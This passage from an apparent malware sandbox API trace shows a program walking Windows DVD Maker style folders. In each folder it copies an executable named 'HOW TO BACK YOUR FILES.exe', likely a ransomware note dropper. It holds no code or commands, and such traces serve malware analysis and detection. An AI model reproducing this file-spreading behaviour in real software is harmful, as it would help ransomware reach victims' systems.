Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" [0074.626] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.626] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.634] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.634] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5dfd6540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dfd6540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.634] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.634] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.634] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall" [0074.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0074.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0074.634] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall") returned 53 [0074.634] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall" [0074.635] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.635] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.638] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.638] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5dfd6540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dfd6540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.639] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.639] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.639] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" [0074.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4a20 | out: hHeap=0x2b0000) returned 1 [0074.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0074.639] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 50 [0074.639] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" [0074.639] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.639] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.649] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.649] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa108fe2a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5dffc6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dffc6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.650] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.650] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.650] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" [0074.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0074.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0074.650] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 52 [0074.650] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" [0074.650] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.650] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.658] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.658] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5dffc6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dffc6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.658] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.658] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.658] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" [0074.658] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e49b0 | out: hHeap=0x2b0000) returned 1 [0074.658] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0074.658] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 50 [0074.658] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" [0074.658] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.658] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.666] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.666] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e022800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e022800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.666] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.666] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.667] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" [0074.667] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0074.667] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0074.667] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 59 [0074.667] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" [0074.667] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.667] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.673] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a65ec8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e022800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e022800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.673] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.673] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.674] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter" [0074.674] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4940 | out: hHeap=0x2b0000) returned 1 [0074.674] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0074.674] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 51 [0074.674] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter" [0074.674] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.674] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.680] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.680] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4d7984, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e048960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e048960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.680] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.680] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.681] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" [0074.681] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1408 | out: hHeap=0x2b0000) returned 1 [0074.681] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0074.681] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 58 [0074.681] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" [0074.681] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.681] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.687] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.687] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa119af33, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e048960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e048960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.687] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.687] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.687] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" [0074.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0074.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0074.687] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 54 [0074.687] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" [0074.687] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.688] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.695] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.695] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f38039d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e06eac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e06eac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.695] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.695] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.695] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" [0074.695] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e48d0 | out: hHeap=0x2b0000) returned 1 [0074.695] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0074.695] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 48 [0074.695] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" [0074.695] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.695] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.711] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.711] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11287e6, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e094c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e094c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.711] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.711] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.712] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" [0074.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4860 | out: hHeap=0x2b0000) returned 1 [0074.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0074.712] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 48 [0074.712] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" [0074.712] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.712] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.719] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.719] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa15a10e8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e094c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e094c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.720] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.720] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.720] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" [0074.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0074.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0074.720] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 55 [0074.720] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" [0074.720] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.720] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.726] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.726] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e0bad80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e0bad80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", 